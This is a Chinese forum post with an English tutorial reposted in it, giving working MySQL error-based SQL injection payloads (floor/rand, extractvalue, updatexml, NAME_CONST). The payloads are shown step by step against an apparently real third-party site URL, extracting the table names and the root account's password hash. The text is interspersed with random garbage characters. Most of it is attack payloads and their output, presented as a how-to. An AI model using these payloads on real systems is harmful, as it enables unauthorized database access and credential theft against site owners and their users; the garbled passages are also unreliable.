|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
# F! f; M" `! K5 y5 w3 w首先进行正常查询: mysql> select * from article where id = 1;
9 M7 E6 e$ |( S' s9 U4 r& T$ _+—-+——-+———+
2 j1 U# j* `! h. }, |; C3 l| id | title | content |
; T7 S! P) l7 d0 ^6 v4 M" v5 @$ m+—-+——-+———+
0 P" y4 y% ^ ^! s' {| 1 | test | do it | B( A2 X2 h+ l L
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);- z1 c& W5 e [2 N& e" V# p
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
8 v' n7 {: i$ \! i+ t7 f例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);6 P& }" t2 {" ^. W1 J( ?* u& G
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
7 N1 s9 z# a: [# c3 g3 uERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue/ ~5 V; d/ e9 F+ z* q6 e
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–2 n% P# K. C$ ]1 O- D
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ 5 @ i5 J5 P3 R
) K7 l; n% H% P* C( o( U. G1 q* Q4 [9 I
再收集: , i4 [3 |0 Y9 ?+ T$ K% e8 n; z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
' X0 N) d8 t- @ m; F
' F% x9 E! t, ]! e/ RError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
2 x/ C' \$ y% G5 | I, d9 u/ m# ?$ j% a2 s6 I0 f
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
4 ^5 D& C* |1 H& f- l( o$ b( J) g- J/ T1 [
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
- v V# R+ B2 K7 W' x: N7 V, |4 c% u/ M: H. k) M
MYSQL高版本报错注入技巧-利用NAME_CONST注入
3 f# I6 G( S4 P( H5 FIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. / L# d/ t* T0 h8 e0 |. I; @9 m0 Y
u. }4 ^& @& P* b7 c
' @/ U3 g0 I. |; b相关信息
5 G) ?" K4 c+ V# x
8 i6 W. m1 u! aNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.3 D. _" Y1 E& U, D0 G; j. _( H
, R; }" _ r% u* Y# B q: x- G
Code:
( l9 I. L0 p4 @' t' P7 I- J9 jNAME_CONST(DATA, VALUE)
/ k; j; c. @$ B8 p- C- e, A- Y
: H. C+ f, Y" Z% H PReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
+ x* D2 a9 j- w/ t- B7 F6 q5 z
SELECT NAME_CONST('TEST', 1)
. F" f7 ~# j/ i- ~7 h
2 i/ [0 d* M* j& ^0 X# y& K. G; O; {% J, \9 G0 z E
, x% A2 Q- f2 w/ h' e; S, }3 J
|---------------|
' L* I, \ N9 p, s$ g# Y" E| TEST |) j4 h: k6 ~$ \' P6 S
| |2 N. m* U$ K. e* B- P: f2 H9 Y6 }
|---------------|
J' T2 ?3 ?8 |! v" \0 d7 q; |7 J9 J| 1 |
5 W$ I6 P" S+ ~# F% D( K: A| |
" r' t' s3 n+ j. l' r! A' [" |& t|---------------|2 p, M' G% t! m2 L
' t# {9 X" x/ z
; L* _/ B% }8 ?1 o$ P V; [/ k! ^
+ [: q8 x4 R0 P7 R c) T; Z1 q" t$ [" W) f/ g7 A: h3 G
http://dev.mysql.com/doc/refman/5.0/en/m...name-const3 E6 X, \$ Z, w
Intro to MySQL Variables5 A7 @0 M& W: z
1 @0 W. f1 A: P4 r
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
9 Y" ]! C) H( E1 a# l4 e
/ }5 _* m, Z8 d( DCode:
; [* k5 G( T. ^$ Qhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2612 ]9 e2 v: S$ Q) ]/ ]8 c8 X
' \# f/ W% k+ }. r
; t. ~% Y8 N8 A$ h1 T, @8 b1 k8 Y- J4 v
( w L: v" ~8 d5 o \8 s& i, r2 n3 T+ H, w6 ]$ H
Code:
& ~3 R) |. x) U! a; W# fand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
: m6 x. u' e) z4 A& a+ a) G
! i8 x0 c; v$ H2 l) X2 f4 i) S
/ u6 u# |6 K' U XVAR = Your MySQL variable.
) W3 j S3 z) v& P9 j" Z* S; o& s: q5 N6 w Y
MySQL 5.1.3 Server System Variables: V& V( `$ K5 c- t
) A7 ]" C) b1 p \* [! ULet's try it out on my site..
: X& \8 h* F" s" k2 l& v6 f1 W( z2 p! l, a
Code:
- ~3 v- f K) H1 R& q' ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--) K$ c) B* J% Q
- z- d& U# ?7 L' r9 Z0 ~1 h( l
Erroruplicate column name '5.0.27-community-nt'
# [6 h: w/ P* S6 D5 \9 B5 Y6 ~6 C p+ [" Z
& H. Z* i# y& l- W6 F- f
, m# u. x7 W, {" ]7 t& E# Q. Q# V, a5 L5 o" R R: W. v
. b. b/ H" s: W( A
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again..., _) j; M" e" B& Y) {1 @
% [9 \* A+ S6 j6 Z5 {8 |2 M. hData Extraction' K: ?6 ~( |1 H5 _6 w
7 U& Z2 H# m7 iCode:5 B3 Q, X' n4 m1 h. i4 \
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
6 P0 J1 m; |/ f. J) k# j7 U! c* _0 K' T( a
5 d/ q/ a0 W) j% X) Z! OWe should get a duplicate column 1 error...! E& O; v% a+ Z: b3 M8 {. O
; V3 i0 N' w: g0 |( bCode:
3 `6 k4 b7 E8 f( vhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--7 z' A* Y0 K$ B; |+ O
- H# V# @% ^3 w" M t8 z% p' i
Erroruplicate column name '1' x7 y5 ~- w" P2 B: b" `. t
4 e9 ^6 n, z ?; {$ g3 b/ u2 e0 q8 k! \
; L: b7 \: H+ t9 y/ b# ]. R G. A/ B% D
( [% A: T# ~6 p2 c
) k& D3 D+ t" e [Now let's get the tables out this bitch..# }9 P- c* [8 D4 X- \0 Y# M- c% C
+ U" M: U' D ?- d
Code:
7 E% A6 |0 B* }1 V: o+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--' u! K: J' v. ^: v" i0 _2 P- {
; w% a; A7 ^9 m4 \& Z
3 j5 {2 j, r$ ?" {. |2 sLet's see if it works here, if it does, we can go on and finish the job.
: @ B/ o% s) ?* [" B; k, V& a) |
Code:6 y- g- g7 v# g) C P* T b* `5 g
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--7 C( O7 ?& L. {
4 V5 r- Q( D& L3 H
$ Q: g0 q! O% W# l- p" p
Erroruplicate column name 'com_admanage+ i$ g1 \, k( w* u2 U
9 D. N6 P+ |. D; _% G- U( N
% I* G z$ } f1 J
* ]2 y; Z, w) J/ W% `# l) b* m% k$ `. `% |6 z
5 C. g! t! X( c0 o8 P2 A3 V7 x( ^0 h- U- Y* ], n# j$ F) Y
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
8 e; }& t' W6 B/ @: ]" x! H9 k4 o# v$ w
Let's get the columns out of the user table..( `& X/ U9 P9 l, E
# c1 N4 i* j4 g: z3 {5 UCode:0 ^) I% S0 C6 y8 w! x4 Z
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--% y. }( ]& X+ Z! c: b+ w
* Z+ W* M c$ U* D% F" H4 z# p+ G& q5 O0 n, h
So mine looks like this, and I get the duplicate column name 'Host'.5 B. r0 @' Y' c5 y
3 k9 p R( I0 _' jCode:. h% a Y5 M' S: |* c; Z: g
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
4 _5 {- t7 [0 q, q: k5 o+ ?0 u
Erroruplicate column name 'Host'
6 a0 F! B" J! \6 D0 n& i) \! L1 w6 ?! p
4 ~, v5 K# i1 L& A7 w8 N0 F2 J" A$ o9 {0 a7 t. B# S8 J
% Z y X4 r4 O2 X+ f7 G H
& k, n/ H; V8 @3 V' M) W3 Z7 ?8 ~. n x( Y- `
Woot, time to finish this bitch off.* h) l5 S( }% k. T' `5 B. N
7 u5 x: M& V4 y4 }3 @
Code:
& b# ]6 y0 W7 w1 q+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)-- D9 u8 ~; M9 D. m
6 l3 D; m* k/ S/ V1 K* M+ u
# f/ e( D- Y! w4 J% H% RSo mine looks like this...8 Z5 O4 v8 c) i' m6 c: o
& O9 ?- s- C) @. t ^
Code:
7 j0 N8 s8 f3 khttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--( X- Z9 O4 s, r: Y! y
3 h- ~, h% f* V- W8 iErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
6 q! M/ }; _$ k: p1 Y5 Z% c
( P2 q5 _% A+ O) R/ h- \, C6 v9 \) I2 z
! _4 o2 A- a: v: Y- k
1 u, z, f. v& E7 U
; A i- `* ~7 G
' ^. @. u' K7 J* v' }$ T, Z, e/ x
And there we have it, thanks for reading.
0 W! y! t5 f2 e, J
' ?5 _. C; V4 b5 |3 P$ @ |
发表于 2015-11-11 19:03:37
收藏
支持
反对